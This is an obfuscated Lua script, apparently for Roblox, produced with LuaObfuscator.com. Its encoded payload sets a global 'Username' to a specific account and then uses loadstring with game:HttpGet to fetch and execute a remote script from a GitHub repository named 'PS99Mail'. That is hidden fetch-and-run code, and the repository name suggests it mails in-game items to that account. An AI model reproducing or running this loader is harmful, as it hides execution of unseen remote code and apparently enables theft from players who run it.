--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=0;local v72;while true do if (v71==(0 -0)) then v72=(v31/(2^(v32-(2 -1))))%(((3 -0) -1)^(((v33-((1067 -(68 + 997)) -(1271 -(226 + 1044)))) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v72-(v72%(569 -(367 + 201))) ;end end else local v73=927 -(214 + 713) ;local v74;while true do if ((0 + 0)==v73) then v74=(1 + 1)^(v32-((3823 -2945) -(282 + 595))) ;return (((v31%(v74 + v74))>=v74) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=117 -(32 + (435 -(87 + 263))) ;local v35;local v36;local v37;local v38;while true do if ((0 + 0)==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + 1 + 2 );v19=v19 + 4 ;v34=958 -((1072 -(67 + 113)) + 65) ;end if (v34==(2 -1)) then return (v38 * 16777216) + (v37 * (121138 -55602)) + (v36 * (469 -(157 + 56))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39~=(2 + 0)) then else v44=nil;v45=nil;v39=3;end if (v39==(1180 -(1123 + 57))) then v40=0 + 0 ;v41=nil;v39=1;end if (v39==4) then while true do if (0==v40) then v41=254 -(163 + 91) ;v42=nil;v40=1931 -(1869 + 61) ;end if (v40==(2 -1)) then local v100=0 + 0 ;while true do if (v100~=(0 -0)) then else v43=nil;v44=nil;v100=1 -0 ;end if (v100~=(604 -(268 + 335))) then else v40=292 -(60 + 230) ;break;end end end if (v40~=(1 + 1)) then else v45=nil;v46=nil;v40=3 -0 ;end if (v40~=(3 + 0)) then else v47=nil;while true do local v101=0;local v102;while true do if (v101~=0) then else v102=1474 -(1329 + 145) ;while true do if (v102==(972 -(140 + 831))) then if (v41==(813 -(569 + 242))) then local v122=0 -0 ;while true do if (v122~=(1851 -(1409 + 441))) then else return v45;end if ((718 -(15 + 703))~=v122) then else for v144=1 + 0 ,v24() do local v145=1024 -(706 + 318) ;local v146;local v147;while true do if ((438 -(262 + 176))==v145) then local v184=0;while true do if (v184==(1722 -(345 + 1376))) then v145=689 -(198 + 490) ;break;end if (v184~=(0 -0)) then else local v186=0 + 0 ;while true do if ((4 -3)~=v186) then else v184=2 -1 ;break;end if (v186==0) then v146=0 + 0 ;v147=nil;v186=1;end end end end end if (v145==(1207 -(696 + 510))) then while true do if (v146==(1086 -(461 + 625))) then v147=v22();if (v21(v147,1289 -(993 + 295) ,1 + 0 )==(1171 -(418 + 753))) then local v191=0 -0 ;local v192;local v193;local v194;local v195;while true do if (v191==(1264 -(1091 + 171))) then while true do if (v192==(1 + 2)) then if (v21(v194,3,9 -6 )==(1 + 0)) then v195[2 + 2 ]=v47[v195[533 -(406 + 123) ]];end v42[v144]=v195;break;end if (v192==(1769 -(1749 + 20))) then v193=v21(v147,1 + 1 ,3);v194=v21(v147,1326 -(1249 + 73) ,19 -13 );v192=1;end if (v192~=(1147 -(466 + 679))) then else if (v21(v194,375 -(123 + 251) ,1)==(2 -1)) then v195[5 -3 ]=v47[v195[1902 -(106 + 1794) ]];end if (v21(v194,9 -7 ,700 -(208 + 490) )~=(1 + 0)) then else v195[3]=v47[v195[3]];end v192=1 + 2 ;end if (v192~=(1 + 0)) then else v195={v23(),v23(),nil,nil};if (v193==(114 -(4 + 110))) then local v206=202 -(14 + 188) ;local v207;while true do if (v206~=0) then else v207=675 -(534 + 141) ;while true do if (v207==(0 + 0)) then v195[3]=v23();v195[4 + 0 ]=v23();break;end end break;end end elseif (v193==(1428 -(41 + 1386))) then v195[3 + 0 ]=v24();elseif (v193==(105 -(17 + 86))) then v195[3]=v24() -((3 -1)^(11 + 5)) ;elseif (v193==3) then local v213=0;local v214;local v215;while true do if (v213==0) then v214=0 -0 ;v215=nil;v213=2 -1 ;end if (v213~=1) then else while true do if (v214~=0) then else v215=0;while true do if ((166 -(122 + 44))==v215) then v195[3]=v24() -((5 -3)^16) ;v195[6 -2 ]=v23();break;end end break;end end break;end end end v192=2 + 0 ;end end break;end if (v191==(0 + 0)) then local v196=396 -(115 + 281) ;while true do if (v196==(0 -0)) then v192=0 -0 ;v193=nil;v196=1;end if (v196==1) then v191=1;break;end end end if (1==v191) then v194=nil;v195=nil;v191=2 + 0 ;end end end break;end end break;end end end for v148=1 + 0 ,v24() do v43[v148-(2 -1) ]=v29();end v122=1 -0 ;end end end break;end if (v102~=(0 -0)) then else if (v41~=(0 + 0)) then else local v123=1257 -(1043 + 214) ;while true do if (2~=v123) then else v41=868 -(550 + 317) ;break;end if (0~=v123) then else v42={};v43={};v123=1 -0 ;end if (v123~=1) then else v44={};v45={v42,v43,nil,v44};v123=287 -(134 + 151) ;end end end if (v41~=(1666 -(970 + 695))) then else local v124=0 -0 ;while true do if (2==v124) then v41=2;break;end if (v124==1) then for v150=1,v46 do local v151=0;local v152;local v153;local v154;while true do if (v151~=0) then else local v185=320 -(53 + 267) ;while true do if (v185~=0) then else v152=1990 -(582 + 1408) ;v153=nil;v185=1;end if (v185==1) then v151=3 -2 ;break;end end end if (v151==(1 -0)) then v154=nil;while true do if (v152~=(0 + 0)) then else local v187=0 -0 ;local v188;local v189;while true do if ((1825 -(1195 + 629))==v187) then while true do if (v188==(0 -0)) then v189=241 -(187 + 54) ;while true do if (v189==(781 -(162 + 618))) then v152=1 + 0 ;break;end if (v189==(0 + 0)) then local v198=0 -0 ;local v199;while true do if (v198==(0 -0)) then v199=0 + 0 ;while true do if (v199~=(1637 -(1373 + 263))) then else v189=1001 -(451 + 549) ;break;end if (v199==(0 + 0)) then local v210=0 -0 ;while true do if (v210~=1) then else v199=1 -0 ;break;end if (v210==0) then v153=v22();v154=nil;v210=1;end end end end break;end end end end break;end end break;end if (v187~=(0 -0)) then else v188=1384 -(746 + 638) ;v189=nil;v187=1;end end end if (v152~=(1 + 0)) then else if (v153==(1 + 0)) then v154=v22()~=(0 -0) ;elseif (v153==(343 -(218 + 123))) then v154=v25();elseif (v153==3) then v154=v26();end v47[v150]=v154;break;end end break;end end end v45[7 -4 ]=v22();v124=1583 -(1535 + 46) ;end if (v124==(0 + 0)) then v46=v24();v47={};v124=1 + 0 ;end end end v102=406 -(118 + 287) ;end end break;end end end break;end end break;end if (v39==(561 -(306 + 254))) then v42=nil;v43=nil;v39=1123 -(118 + 1003) ;end if (v39==3) then v46=nil;v47=nil;v39=1 + 3 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=377 -(142 + (2210 -(1913 + 62))) ;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v48==(4 -3)) then v51=1;v52=(v21(v50,1 + 0 ,20) * ((1 + (1662 -(1477 + 184)))^(1009 -(553 + 424)))) + v49 ;v48=2 -0 ;end if (v48==(3 -1)) then v53=v21(v50,259 -(64 + 174) ,81 -50 );v54=((v21(v50,(38 -9) + 3 )==(1 + 0)) and  -(1 + 0)) or (1 + 0) ;v48=2 + 1 ;end if (v48==((205 + 14) -(42 + 174))) then if (v53==(0 -(1933 -(565 + 1368)))) then if (v52==(0 -0)) then return v54 * (0 -0) ;else v53=1 + 0 ;v51=0 + (0 -0) ;end elseif (v53==(3551 -(363 + 1141))) then return ((v52==(0 -0)) and (v54 * ((754 -(239 + 514))/(0 + 0)))) or (v54 * NaN) ;end return v8(v54,v53-(3114 -2091) ) * (v51 + (v52/((1331 -(797 + 532))^(38 + 14)))) ;end if (v48==(0 + (856 -(564 + 292)))) then v49=v24();v50=v24();v48=(2 -0) -1 ;end end end v26=nil;function v26(v55)local v56=(0 -0) -0 ;local v57;local v58;while true do if (v56==(305 -((359 -115) + 60))) then v57=v3(v16,v19,(v19 + v55) -(1 + 0) );v19=v19 + v55 ;v56=478 -(41 + 435) ;end if (v56==(1001 -(938 + 63))) then v57=nil;if  not v55 then local v97=0 + 0 ;while true do if (v97==(1125 -(936 + 189))) then v55=v24();if (v55==(0 + 0)) then return "";end break;end end end v56=1614 -(1565 + 48) ;end if (v56==3) then return v6(v58);end if (v56==(2 + 0)) then v58={};for v81=268 -(176 + 91) , #v57 do v58[v81]=v2(v1(v3(v57,v81,v81)));end v56=1141 -(782 + 356) ;end end end v18=5;end if (v18==2) then function v22()local v59=1092 -(975 + 117) ;local v60;while true do if (v59==(1875 -(157 + 1718))) then v60=v1(v16,v19,v19);v19=v19 + 1 ;v59=1 + 0 ;end if (v59==(3 -2)) then return v60;end end end v23=nil;function v23()local v61,v62=v1(v16,v19,v19 + (6 -4) );v19=v19 + (1020 -(697 + 321)) ;return (v62 * (697 -441)) + v61 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v63)if (v1(v63,2)==79) then local v75=0;while true do if (v75==0) then v20=v0(v3(v63,1,1));return "";end end else local v76=0;local v77;while true do if (v76==0) then v77=v2(v0(v63,16));if v20 then local v103=0;local v104;while true do if (v103==1) then return v104;end if (v103==0) then v104=v5(v77,v20);v20=nil;v103=1;end end else return v77;end break;end end end end);v18=1;end if (v18==7) then function v30(v64,v65,v66)local v67=0;local v68;local v69;local v70;while true do if (v67==0) then v68=v64[1];v69=v64[2];v67=1;end if (v67==1) then v70=v64[3];return function(...)local v83=v68;local v84=v69;local v85=v70;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v98=0,v91 do if (v98>=v85) then v89[v98-v85 ]=v90[v98 + 1 ];else v93[v98]=v90[v98 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v99=0;while true do if (v99==1) then if (v96<=4) then if (v96<=1) then if (v96==0) then v93[v95[2]]();elseif (v93[v95[2]]==v95[4]) then v87=v87 + 1 ;else v87=v95[3];end elseif (v96<=2) then local v111=v95[2];local v112=v93[v95[3]];v93[v111 + 1 ]=v112;v93[v111]=v112[v95[4]];elseif (v96==3) then local v129=0;local v130;local v131;local v132;local v133;local v134;while true do if (v129==4) then v93[v134]=v133[v95[4]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v129=5;end if (v129==6) then v88=(v132 + v134) -1 ;v130=0;for v175=v134,v88 do v130=v130 + 1 ;v93[v175]=v131[v130];end v87=v87 + 1 ;v129=7;end if (v129==8) then v95=v83[v87];v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];v129=9;end if (0==v129) then v130=nil;v131,v132=nil;v133=nil;v134=nil;v129=1;end if (v129==5) then v87=v87 + 1 ;v95=v83[v87];v134=v95[2];v131,v132=v86(v93[v134](v13(v93,v134 + 1 ,v95[3])));v129=6;end if (v129==9) then v87=v95[3];break;end if (2==v129) then v87=v87 + 1 ;v95=v83[v87];if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v66;else v93[v95[2]]=v66[v95[3]];end v87=v87 + 1 ;v129=3;end if (v129==1) then v66[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];if ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v66;else v93[v95[2]]=v66[v95[3]];end v129=2;end if (v129==3) then v95=v83[v87];v134=v95[2];v133=v93[v95[3]];v93[v134 + 1 ]=v133;v129=4;end if (v129==7) then v95=v83[v87];v134=v95[2];v93[v134]=v93[v134](v13(v93,v134 + 1 ,v88));v87=v87 + 1 ;v129=8;end end else do return;end end elseif (v96<=7) then if (v96<=5) then v93[v95[2]]=v95[3];elseif (v96>6) then v66[v95[3]]=v93[v95[2]];else v87=v95[3];end elseif (v96<=8) then local v118=v95[2];local v119,v120=v86(v93[v118](v13(v93,v118 + 1 ,v95[3])));v88=(v120 + v118) -1 ;local v121=0;for v125=v118,v88 do v121=v121 + 1 ;v93[v125]=v119[v121];end elseif (v96==9) then local v138=v95[2];v93[v138]=v93[v138](v13(v93,v138 + 1 ,v88));elseif ((v95[3]=="_ENV") or (v95[3]=="getfenv")) then v93[v95[2]]=v66;else v93[v95[2]]=v66[v95[3]];end v87=v87 + 1 ;break;end if (0==v99) then v95=v83[v87];v96=v95[1];v99=1;end end end end;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365726E616D65030E3O004F4E455F5049454345302O363832030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O0012053O00013O0026013O0001000100010004063O00010001001205000100033O001203000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000E00010004063O000100012O00043O00017O00",v9(),...);
